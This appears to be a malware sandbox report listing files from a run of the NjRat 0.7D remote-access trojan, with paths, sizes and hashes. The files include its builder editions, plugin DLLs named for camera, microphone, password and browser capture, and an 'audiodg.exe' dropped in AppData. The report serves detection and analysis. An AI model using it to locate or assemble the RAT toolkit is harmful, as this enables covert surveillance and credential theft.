d1e8a1e35307cae963236d0e3d6759ae71299166b48848964b83b59719ddcf2e9b7763687e643a7014d55f65b67ea9e635605ea175fac3f535945a9b8aa19c2f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
9bdc9104eabc2c977b889227b221b3f6

SHA1
5cce40e0227da278ef2a87c1c53ad199e37c9db9

SHA256
28f04a87427ac40479a559f9d5da59784db879ae32d2bf6d0fdfc1a6b18a9e2c

SHA512
befb181f9fd299ccb4fcf21f1351a97e66673392c89f8b7f2f6d29b312c7eccad513f8df5b74d0408f2e75a3f381e6fc0ff34f517388a03b46a5948e2f862ad8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
58adc405b379dd430107f86f9a499990

SHA1
f186d2bd734edfa94ce5f74aa3a884abac80446f

SHA256
a072e5c93bbabc71b9aac4c8b3b0c58dca0c2410da13013ccc2dadce3f8c3451

SHA512
600bf3f6ff69886d06d8d2b9acbbb37c4527cfd66e36297dcca13d941eed0ef60b5b420252ba159ef327c0460d1a18e721c5e96fdaf9eae08282eb96d0c579bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
f7d5ef177ce0915cb95cd2af303e7872

SHA1
708ce77ad4268b59f555cddb75b50e193e9f645c

SHA256
bdfcdb68c9559002f7fdc1754497d122a9f0164b63c9abe9f6a5eac9fea5c493

SHA512
bcaa2732dfc0987f99b355e2a278d4eb1322190107b637e1c7677f1914aa739f0d3b1f424490e0df41ee5915646888cb95f4eb28a795b04bb9e26962cf42fa20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
dd877626a3fbeb0a6a5ab1418631eb04

SHA1
55a10f65ed31beefdd89951b4f9b36cfd3be7aea

SHA256
cf8a95ae57c446e3dc312a0784a06036565fccc49f636c2e45d34573c4c1326b

SHA512
27b92f01fa1ea7f4b77b2e4281fa96bcbd112c4c0d67fd3b56c79db01639c54a5d93f6b040aacb816eb4502903233a59e7a7058a01b23b76594a560e3e80da0d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
66521be952cedf3d2d9cb62864f33b25

SHA1
e5f309d3c53132540ca0eda805d63b220b9ec46a

SHA256
2136c2147bf70d0af42a01ced3f6a4faa20642a6c10d4c168eb24b403ffb551c

SHA512
cb149fcb8b90a1ccfb000b56d901e5f7e1bc1f027e3ae58e281ea13a6c488104469c30467c8b844d15c2eb7f3c354968fcf37499c4bb7898e0c9ff4de4e3079e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
8919467aae23848ea0e76eef86a154fa

SHA1
068a0b2e61ba1f9fb277b0a5f475b3ce968b4bf9

SHA256
cfed230e04bfe188cd3e82920fa49cda607684a837f4866b3404b325392515c2

SHA512
efcfe6925b7e38012af09f3e971d81d448e2d50267df383fd6ba2b3f912ba17b97437c8339762c2e46685bb8cb77e896d215ba95ac6a600bcf40967c9b987a3d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ed6df7e34853c2133e0ff0343513184d

SHA1
e4e174fd46418c4d37ee3a088a9407e1dda2f018

SHA256
867daa5f0e2f4208adf1e3e04d62556788c45c9f800c48eb5b3a1f707a167759

SHA512
13200dacd8f927270f0cd5b1fd071d0911ed669ff0c43cab2cbb830fa5824c51d549bb867e86839aca1648b7e473cbe03d86fa80706cf85b0842dc8f69f8bcb5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
678413ccfa6d5e49c7375e25377cf4fb

SHA1
f054e17773026bed5d12077fc54a5f1bb313ec57

SHA256
5f240d28f63a457eb712b3d7b8702a65fe888eb28572717c0b63d9335248ba7f

SHA512
f168f48e8b3fca20789e3d2b36af31578b5fa5b46602be7e91473aab92eb18b8f3adbeb01d3558c9db4d5a780a694b9081b2d50d424ab5ebb71ac6ec17fa8fcc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
8d668ba6386261c8ebfafc09000b29a9

SHA1
6b62016d2010e0f604a5ca46a3e178ec2ad3555f

SHA256
82d4c5358ee7f9816602ae4654bc084847ab968ae19a5a8358a9fe2c16a25efd

SHA512
128343c36da633712b9c3bab28026b53090a44ba7213c9245cf1164719341099576859ad93f0855e2b47a1834b6286d3d97e7b68d66e54860cda8fbdcf0bbaab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\d6ddb3ad-da47-449c-ab85-81f0a46b18f0.tmp

Filesize
10KB

MD5
687982d2516d7d7d462fa29a0b76a0b4

SHA1
76505b11a063f82f77ad9eabed7208eb18cb57cf

SHA256
b2a25d40f7f0c5e64b2261cc031246d92aa2bea1168437930656b12ba3036904

SHA512
204cd1f1db926cd7d5790471d2d0953a341cdc28307a41d3a2b41af6bf79d827ce142e9ddf18105d30b5f70e1c7f0a859cd7debbcef5bbce0dc8454c805b7f84

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
af281d6a9e0ef32a6800a3b05378c81b

SHA1
e0a67f882fbb67ef47d894977fab45185bea034c

SHA256
8cb3adc33f924eee1950135db294607fc1d498a3f76e60c44fef957047cfdfc7

SHA512
f50f5597443fbbec356399207f9bb85e0835c4799ed4f94a19d3dacb38f149c17f8014611efd4afbf35fb3c4c3b9eef2ec1800a21a33f6b550d1e90829cfb68c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
9071994256cc31ad77e54d390faf6484

SHA1
92451b70c53b65a5149ab55dfef28200801bb68e

SHA256
50974cab0f7ddb4a249864bbdd2c13e74ebf45be1705d617ebdb76916345974a

SHA512
6c601f4ee70a7aab45c99b4775e41e8834579269a990fe166424727a3ff920bccdf38e5ab8b3b23e1f2eb5686af409395ab13b42633ca693c430a56117f4903b

Download Submit
C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe

Filesize
8.5MB

MD5
70ea9c044c9a766330d3fe77418244a5

SHA1
18602d0db52917b88cbdab84ba89181e6fd4686a

SHA256
b78fb092e151db613cba51d7f2532547e48c6f4712809a485f272e2ab55776a5

SHA512
5261865e7ca21e928b956a97518366c9dc218a2312961e0ba0b72b37ae7c797176382de3c3dc1d2949aca51c3db330562f1087a71efdc7c3c3b8f8928872f917

Download Submit
C:\Users\Admin\AppData\Roaming\audiodg.exe

Filesize
355KB

MD5
d9dfa8ba182529445890b5021e159b77

SHA1
64f8724f8cd76adff12364e6bb2fc9eaceadb1ba

SHA256
60df809a613aab714e2edad3338500a081fbae866cee3a4a3113abed60f5d59f

SHA512
d18f5d13d5ea4226e309fe7d5b59eac5770f391b92c5a03e0f14cd5e23a45b75ed2353e7a388198162061686d9c4675e11428d0362a01b7e05a0b4638fb10803

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main.zip

Filesize
48.8MB

MD5
80d3d5163cafe75e0f2d1666a4c65414

SHA1
b94d1e8abcf337c888f403e4e7563c896fa7d51c

SHA256
d96bb6e66aef5a2901a0bfb80df3382d79cdcf60c9916badf27b456244bc6929

SHA512
d606abeacdb158dfdfabd89d7e3c12800704faa499821d01494899d5c36d93d2cc540d8747633535e148abffba4ac8c1fb3016fc03535c3d75cf74edd34daae3

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\GeoIP.dat

Filesize
1.2MB

MD5
797b96cc417d0cde72e5c25d0898e95e

SHA1
8c63d0cc8a3a09c1fe50c856b8e5170a63d62f13

SHA256
8a0675001b5bc63d8389fc7ed80b4a7b0f9538c744350f00162533519e106426

SHA512
9bb0c40c83551000577f8cf0b8a7c344bc105328a2c564df70fabec978ad267fa42e248c11fb78166855b0816d2ef3ec2c12fe52f8cc0b83e366e46301340882

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\NjRat 0.7D Danger Edition.exe

Filesize
8.2MB

MD5
eda04645089d60f5cb602c8012a33e07

SHA1
85ae9d1a404d0a2063bee3d8d7bb9bef233fa71a

SHA256
e6cff62a0e8e7c654eec97093a1295773f223cd3a6a11f65c91491cfbd6be751

SHA512
fe9a1bddd90aabb6f5abb1d15666e75ab3c6136d1dbf2c79f0bbcd1dffe2089ac8a73ffe11b3d1cbbd6b393fc51f921fd5c50bf490a38e9038d2c366aaa9468d

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\Settings.ini

Filesize
15B

MD5
332f4072f2109e4d81f2701c2387b186

SHA1
36bbaf7dfa5a6d6d52ab04f533359f3c65cfa8e4

SHA256
17f547710bf4fefb27ff4470e0f78089c4888567eec25380e136d9fde1e02276

SHA512
53841fa1fb9f0fc1c6633e863f1195d27c8dfed1c0caa7ae519d224893eab3fb23487b130539b5c1839eb8aa99d51b3450b6d15cc63275c0a32841897c84d67a

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\1.dll

Filesize
367KB

MD5
c3e8ff959a4027bc8cd67e26d3003370

SHA1
5469f8a06813027ab3f8bcfaf4d5c87810ab347a

SHA256
afda8e5fb125e27aa1062365ab4b77c4fa3acd14a6e435ab7ddde18644266af3

SHA512
d0f461200daa100f6d05320c538d793e662f9ddfb13fa70351bb1bdf21cf7a1c256d284c3378551d288d7275cfa9cb32e84cdb13e7bc49ca4b5483d8ef999f15

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\10.dll

Filesize
1.1MB

MD5
e3bf65ce42edca6891fb7123711ace2c

SHA1
455a838ce4c51976faa9312ae212d7fc82ff7e19

SHA256
4d04ead199b9f3433314ac5a4c5466d0ce5e4c43e2fdd381ae0d6a1e705e6f1e

SHA512
1bce779f1afc8a10c9dffe245ebfb9c46c69cf805cc24dfbb5edfe6e3577b0b34e7ee59763a31e05579f22a584628c10c87fcfb6e9f180d16a0648b6fe05f490

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\2.dll

Filesize
271KB

MD5
07194ab187366cab46972f2f2f1ef0b5

SHA1
14927d4482a318004a42a5cf8cc40ad08673a302

SHA256
7ab30a602581387fa97faf7f8100d2c98bd3407372f723f805f2346addb7d008

SHA512
989720c17fca490d1fb3a6166f713b07410b0525c7ee142d192de4f5a044f904633b3eb8c3e83f8448bc7ee3da5cb448711067025cdf037d20cf1e9d18131446

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\3.dll

Filesize
223KB

MD5
fc2c601bba0029124a120db3035b5652

SHA1
a56b3b16e0814ed4da024ab2eee968c17c004698

SHA256
666f19c5d6528c4e071b4414aa410eae3497c809107739db87e39374ceb8593c

SHA512
0c49ad30c8bbf125fa3a47ac63d862063b8feadd87968356237a7df08b8cf4ed4b66e1a8852303b32f6d8ff168a24743fc7adeb94de4aa6f72aed3f2c279b95c

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\4.dll

Filesize
202KB

MD5
621ff03775382229afbc039efba07212

SHA1
3bcf1669b70df52059d2fb5c9025ad3fd30170ad

SHA256
d22944f50fdbe7b9fc55807ebca0275e59a0ede94226e2ce365bc507bc96ec68

SHA512
3168bb66d0e2a72df58c46275916fc9cd1d92512b4221fc0259859904d174f9a4b4cec3ff43ec91e4a084ebe4cbfd7349cfba230b1e56403bf36a711d2d8b90b

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\5.dll

Filesize
292KB

MD5
54b06dbc99832ca8a54232351af21059

SHA1
42367bca4add1792f841f9c20bf8d6a6410c0ae1

SHA256
4b6914d1ca3c871a2e79d54bb19a7a66e207548214b215698ac3371595cecb5a

SHA512
e49dbe7b2a58dc5be68cc79aca83a090486786454d03461ae256f5a0b098d8e00f18032bf1eddd7ed7e863580b8c463771704df404009d3ba1b375b4ec9bd87a

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\6.dll

Filesize
628KB

MD5
633b07e6516aea1d677b8d64bfcb04e7

SHA1
8f55062fbec6bea8f8cb689e5228cb0f4b759b59

SHA256
0d01cc53ba6630b8bae7674cfd4deebe6cb0c9e5d2029e3f29c0bc25b2760207

SHA512
456207a76294bfc5f8f88b3c893b1d931604f935a67770349d6ef831674a65de73ed6d01b2c51c0a3499c30543e5011490b0ebfb34598d00504f1574adae3df4

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\7.dll

Filesize
31KB

MD5
ba2d32d8118f59ae4aab0bae941542ed

SHA1
b627f2ffb0c8d82e8b9413228a8b75e70d716f2e

SHA256
814ac620ea996b45e8c0fc55ae57e10c11add1cf4fbe9d260a5f13052051b420

SHA512
1181d91e843f1a51248e4080fe91539d77c749125017fb3a1382da3c7b15317337510a0e18827a7ef6ad091c66ff70801f68597895e81c08e6daf96ca0ade839

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\8.dll

Filesize
259KB

MD5
8ca640310df5533abc19acd7dabc829e

SHA1
38d126c7d252c5aa5963be1022060869bb3daea9

SHA256
06b3345a22309557ec7168efe1d4bb48a6180a9643faa472c9c90b004ce0a1ac

SHA512
a7d699d09e0e78815e842eae633b44c03ad0c974985cf2faa4f8f64ab8ceec164f75390f120170847c59a4f09d9bcb3ab0c3f0377afa5cdf834b4612528a15df

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\9.dll

Filesize
469KB

MD5
1a018036c48b4cd8e0c7d1a7ebea06a9

SHA1
8ec946a133f07bf62754caddf3a884020f430f8d

SHA256
45aa36d007d27ca8e9659cd004a98f048b232161202553da643c4d1df3427459

SHA512
a8a8cbb9a1bfbdbe610bcde92d49674ee155d11fb6992dcd74551926fb3c1d8c2eebc773655638f785079961129cc9112718f2d4764812bbca9f085d3d7bd79a

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\andex.dll

Filesize
100KB

MD5
6032ce8ceea46af873b78c1f323547da

SHA1
8c5bd4a70e0f21aeba41c07976ace2919b64fd80

SHA256
19dc8c66d04d1a1d781e59107e2a1db5fd6288761c9dfd0c6909e533e79d04e7

SHA512
3ada1663cb730f43b44e32ceade5d0b9cae20d1c20001691a1d226d99c82510e001581f67f5131d6c21e0e0cf98e5089c3d0f22a6a1e3347053ed73304ccc6fe

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\cam.dll

Filesize
63KB

MD5
a73edb60b80a2dfa86735d821bea7b19

SHA1
f39a54d7bc25425578a2b800033e4508714a73ed

SHA256
7a4977b024d048b71bcc8f1cc65fb06e4353821323f852dc6740b79b9ab75c98

SHA512
283e9206d0b56c1f8b0741375ccd0a184410cf89f5f42dfe91e7438c5fd0ac7fa4afbb84b8b7ea448b3093397552fd3731b9be74c67b846d946da486dcf0df68

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\ch.dll

Filesize
75KB

MD5
8e39d0bb786fb308842102fb90211910

SHA1
fcc8a86135ac63aaf51e6d80472813b5385feb4b

SHA256
57a02c05691f47b13a6bd77258a559ff193a2e3bc19b6d4339ffd06d2f47569e

SHA512
ace89e18827953ccd61af94ac49cc3b1005be3ab0ab5a44c28d690b33bbfa89c2e4e34970d3a8898e65d63f9956747708e2b64afa21c7fe5799131702fc45850

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\chrome.dll

Filesize
29KB

MD5
685c1eade930e2b40f02f98328fca44d

SHA1
e42f950e1dbed069d7c337c9ff09f55fb90afdf6

SHA256
ec85087f6830b71f106871c59dc8ffa0de91cc3d8ce8c269b7264359d9b4e80b

SHA512
aceb433536f6f8f684219c2d62b64604175d1eb8fb0c3d0aba819c81b6793f2f96b2c8b13d7311f7513234d8d9e62dbb61750156d9ee8d8fdfdb7b5ec69262fd

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\cmd.dll

Filesize
29KB

MD5
189937260ddfd3b529ed1f5d80e9ac08

SHA1
70e63e7ac92f55228a81aae93960df6551cb65a9

SHA256
1adfc8c1d730b305aa7b79973a2a9d7bd7437742e464de3671448b70658b860a

SHA512
053d95d415ca3cbedae305eeb000c57978d96e6bb86319e6f600f7e3236ed95ae8b412d76494d1b4ab7f57956b4869799240b99b3f310dcda2b522eefbb6d464

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\dneg.dll

Filesize
176KB

MD5
0edfdfc37d6e263002e8294424783c35

SHA1
e7bf2e195ff32d5f6d5b09164de94e83d1f0f3f2

SHA256
5b9c1b0aedcd82ce25b5f7d6ced6b38943b5c0ca14f09a27b4bfb4eb4f0204d5

SHA512
14b4bd0a6e6ef26a4713cdb115f298d35530864b00a4c5a9d84c7e27086d232bca2ae18c58831a72ff687b4511735bb0669a5136b59b4813464bb25c384b123a

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\duck.dll

Filesize
63KB

MD5
d7d46952778a85491b34f62991a060d4

SHA1
ff30ef03867eb74f2454375cbe3508ee26b07163

SHA256
5d1217e2c9e820c3e7b2fc28fab4e40d85e0e9f4362e66a451e42d597b8c2650

SHA512
7c9b4c254a1977d1a16ac3aa8ce81d897eeda4465e51c9f0cbe2c03326cc6c3bb7acb89d8d1f4ce1dec03118574b57f30a3400b2dc47b70aa87bfd2f4f99f8bc

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\explorer.dll

Filesize
29KB

MD5
9cc05ec9d58102696092dd1ab9103fc2

SHA1
d4019f352ea64504a357c6447c56f79e06602131

SHA256
2e05264acc620b4828ec23550351bdaa7cc429fb273ecc4450ea58f2b20b7f61

SHA512
a74f5ebbe8f154857af1408aabc2fab30240ff5dd892d5aa9b510c63d51cb8c67605ff6c34459d620c10bb9d13085ac34072235b7bea274605014f9f8a7dbe55

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\explorerr.dll

Filesize
29KB

MD5
2407032a11e906cb7eb171d4e8256992

SHA1
f6dfc9b6632435136167a16f8a5b23fa624246aa

SHA256
b9347d22eab0264a0253aebcfb735ea687453fc85d9a906933673017abe4285e

SHA512
55bed6d2c026c2f29a13f9d17e9c3d0594158cd8caab8a8fe9dd6fdbc5816efddf2c006489c062b7c191d5f6b40541f7d51d58da0353f5c9853162b13c8b325b

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\firefox.dll

Filesize
29KB

MD5
1dae4ce0658e69e451d007200a69de1e

SHA1
141f5b6c4ec400fe58ffdf384a08c138875ab904

SHA256
2fb77c75a773abb9f61c6c918c2ad90d2f694a3f4822e0f934d9549b386cd8ca

SHA512
786b69e5b96fd4ace34fa7226da9d4a0be7cd4f5b475116ac1a07d34a7a2891c5511fb3ff14540719a989e72d5c84c12dc7f0faeab108adb87746d6a611beb44

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\gren.dll

Filesize
155KB

MD5
8775af76bef724f22a0b5bb7c787a1cc

SHA1
39620f580705b8b214f94acc7d1c81bceec15ba9

SHA256
9a8f461b55d753e7f66f3db602a29a079efe626c514920d933a471489ccab951

SHA512
966de3d1d6463eb15ed0b1ad6e1902d343c1b587abecf4fa27798bd576effadbe99a7f787de320cf815dacbfb5795e3dff369802e13d95c96fcb9c54e32bf61f

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\hms.dll

Filesize
61KB

MD5
f4407493019fe05f34b074539519ebc4

SHA1
b3f5ff69ff4fee493440c133f033a0d05a6edd43

SHA256
a5c1bdc7b8c0e456edac031568c8acca0524eeec7e91977d63c41c0a82c608c5

SHA512
24668bd17617e038544ed5cc92385cba01ec1b70725930457a5deb6f4ef1a079e3af8d7f592dad851fb1685387daaf47cc02a6c406042dc7ec1f406d2ab3bfc4

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\inf.dll

Filesize
19KB

MD5
cef141d894400bc2e0096d1ed0c8f95b

SHA1
1bcef29980686dc4cf8ff13f251f1ead7ba6e2d2

SHA256
9648ffd2eb53744c5f78dc8442a8bcbbe9831db1e198be370a62cbf9f51cd896

SHA512
794e7cc5a899407414bb3bbe2f2aadbfcacdeda2eb0381249b8dd5ed342534910b85b1450f509f1d6b36109efdc82eb3ef1eba36b76ce123b1034192d871d2d7

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\mic.dll

Filesize
50KB

MD5
d4c5ddc00f27162fc0947830e0e762b7

SHA1
7769be616d752e95d80e167f2ef4cc6b8c3c21fe

SHA256
b6fb6b66821e70a27a4750b0cd0393e4ee2603a47feac48d6a3d66d1c1cb56d5

SHA512
9555f800213f2f4a857b4558aa4d030edf41485b8366812d5a6b9adcc77fc21584e30d2dd9ce515846f3a809c85038958cb8174bf362cf6fed97ca99a826e379

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\p.dll

Filesize
29KB

MD5
a7a746707ca4e136585570eef6daf2d4

SHA1
50705953b5184d8c0fea9c10619d765648976b78

SHA256
d3cf09c638fb94b81343c94dd1a9d7ee385a5240a1f3d78fc70dc591b417999d

SHA512
dc97a3cdeb599c976bac9ef4e901c97e4bf02035b6ea60c0e8d9a288b220ca66545a4810842623574293ff09bd4c60fdfaa878fd4e7aa2dbd493d4f001fb0ce5

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\pd.dll

Filesize
139B

MD5
7e3c8627a5f7d7b9a8e54541bf4e1eec

SHA1
92907340746a489ba6bdc1a887bf68b160057a3a

SHA256
8701c0d8266cefd9ffb4006a278e9d28963e90e1688f5e1f5c65db6a132be733

SHA512
cf06e93ae7d4942539d5dbac9253c696663c7164697018c5bb9d2b92bfb27eb25a861acaadd81506c124f0ecd43230343f4c2f3257ed9106907bc0270494ffb4

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\plg.dll

Filesize
28KB

MD5
0cbc2d9703feead9783439e551c2b673

SHA1
4f8f4addd6f9e60598a7f4a191a89a52201394a8

SHA256
ea9ecf8723788feef6492bf938cdfab1266a1558dffe75e1f78a998320f96e39

SHA512
06f55b542000e23f5eeba45ea5ff9ffaddddd102935e039e4496af5e5083f257129dab2f346eeae4ee864f54db57d3c73cf6ed1d3568087411203769cf0ddd66

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\ps.dll

Filesize
29KB

MD5
cc65ad514684506f9f22c71d94c537ea

SHA1
36e2bf3159d14552279fc1b80db80a8c177925f4

SHA256
d215b8cc095e913f2d3adbd88ae7691be657104dd52340efba670d04eff1e368

SHA512
5c505b4c49df8e7e83af47719f79018358a39f1df552b2b90dda244b1e41a30559cbe66b1d415a836f403452c5493b26e28ef170376eb5f1a310733e65d8eeed

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\pw.dll

Filesize
403KB

MD5
b8cb1a1d76fe3fd71ac5b5fc175b699d

SHA1
611589181cb1bb72a279e44116fa3ed7c1256ded

SHA256
6d0b37a62e1d2215e2fd8936d3d1d13cd1d620d7678c773e013e70ccf55a674d

SHA512
280d2dbb4702498e11879c1fbf62c6eac8a2c97c2cc520f310e658ee5162329e24ba23d752ba8f549c0ffc85d5c83781ea1c10788ad6546258f83ed9c3c2cc25

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\red.dll

Filesize
61KB

MD5
35be497312c0fa928c92fa3e2fca1783

SHA1
0adbaa1b4d0b9cccb45d0d50021035e254409beb

SHA256
7ff23f4e452d1073547790f12070518b20bb4a305effebbb90212ce141d64e84

SHA512
211643da52801dbea616e1a05d38c4ca4069d96cb50ee6c9ea6ecc43d6abc16750d4f19814061c8f48c924b6c61ae2d93e36a6a0d4493446fa7c1538f4f958a4

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\rq.dll

Filesize
23KB

MD5
2490eda5b4450138ba79f39fcc90048a

SHA1
f8af994fdeeb8afbf7d95e816da389a7eb09806e

SHA256
3bc2898da9cd9e202b7795b330fa3daff81a4b02ab4ecfe47fdd712c53252f12

SHA512
4f96028666bcb0a80730e8429082c2ab839fe8662086ad9735641fe8e55d51f909171124b1500c1da4065f26a9d3118c8b6c24d1827d12c5c887cd1e358a2d58

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\sc2.dll

Filesize
12KB

MD5
19967e886edcd2f22f8d4a58c8ea3773

SHA1
bf6e0e908eaad659fdd32572e9d73c5476ca26ec

SHA256
3e5141c75b7746c0eb2b332082a165deacb943cef26bd84668e6b79b47bdfd93

SHA512
d471df3f0d69909e8ef9f947da62c77c3ff1eb97ac1dd53a74ad09fb4d74ec26c3c22facc18ec04f26df3b85b0c70863119f5baa090b110ab25383fcdb4e9d6e

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\spark.dll

Filesize
29KB

MD5
c78f9243c3e40ab2f4198a61538c7efc

SHA1
e9944ff9f066c8be968f55e319667f27bc41d5db

SHA256
4c19b629100abd685a936f1dfed09dab57c69733e9547ee1a9b9fd1d19d0f6e8

SHA512
d1ca85d6767ea1ebd5ebdb2e9822f04a59404d3d61c4579f01704633c9d1fa12a783447a781808ed840523ae5884d984ef95a6f3663d3e6d1ef1c13829c2ad4b

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\t.dll

Filesize
29KB

MD5
771c11ce7b5e13bc7415aab054af9e4a

SHA1
0bf166884a46b66471a4e03517d14cb1efa37e5c

SHA256
712626ed1ae9b07a876300ee93619e76834b9c2e64d724bcc1daef3060d6cdaf

SHA512
4b7097f4e0d3e2736447ba1ec7ecbcf304cf6cfdc955841f780f35585cb0c9b71600273ee21a8b34ab337a279d857a899bc078eff3b6cdadfc6f0a8c6fb4220d

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\plugin\vu.dll

Filesize
28KB

MD5
6c2210ba180f0e1b9d831c3c6c14c8b4

SHA1
00bebdf704f4cabf254583c6ad87c6e72872b61a

SHA256
501c36ac282029ccf7950a4957d4c10ea72fe18f0ad8d6daeabfe628fa4070a7

SHA512
26a63ad05199cf45acd7519fbc63945097b4c4a89bb2cdfa4f87ba004e1ce106220b0b99419e656de26d164265b3868a9ce541c71b05d4e4db1a9a1343130e9b

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\NjRat 0.7D Golden Edition - Rus.exe

Filesize
1.9MB

MD5
8d540934a359a0480de188a748b3d573

SHA1
556693330454d09e461b0cc16c2c8f69f7f3cd45

SHA256
c81d701c3a4d6b7bcaa40f9c92a1bcfdf2f829954cf1ca15556712fbdc792834

SHA512
d2214389578a2928cc51b7fb098dd8d1ed4677f97a3f6bb18ec5494a3247866c400af7fe5d1a326cd25faf6090139849d3ef0fbb43c62075e5a436c0599d47b9

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\plugin\antiprocess.dll

Filesize
16KB

MD5
b21947a28760750689f46e071d575d07

SHA1
6008a9ff367e7a715422d2e2f96312f1a3231a9e

SHA256
f643ab116e7bd8515032a502b8700afb5bdbfc08fc1caa08817b3061e98b763e

SHA512
75fd467e4be5480e7dc4ce665a50cf5fcea3c4301f17674feec866d04e0f7036efaec0feffa35fc07ab19b70ff82d133c457c88d7c776f62160bff6cf13a2399

Download Submit
C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\plugin\cam.dll

Filesize
62KB

MD5
7eba4d9562bf7fc14f2c1bb142a1aa6f

SHA1
7c0f49bd672100881e7340a480dc6674d5dfc862

SHA256
5f00cda5808e3fd126d452708308ddee6556cb83adaccd02efe83654a40fc641

SHA512
5e7e9ee05674eb6a943b84437a46cd6c4dd7d63cd95bf308cd614026383eafc087590f6238a5282e275cf1875038aaa46ef843a5c6d322e3b7b1a63e2d454830

Download Submit
